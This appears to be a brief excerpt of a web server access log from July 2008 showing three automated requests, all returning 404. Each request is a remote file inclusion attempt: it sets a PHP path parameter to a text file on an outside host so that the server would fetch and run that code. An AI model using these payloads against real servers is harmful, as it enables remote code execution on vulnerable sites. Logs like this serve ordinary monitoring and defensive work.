12.196.98.16 - - [30/Jul/2008:21:59:03 -0500] "GET //forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:22:00:35 -0500] "GET /logs//forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 335 "-""libwww-perl/5.53"
64.246.52.46 - - [30/Jul/2008:22:00:38 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
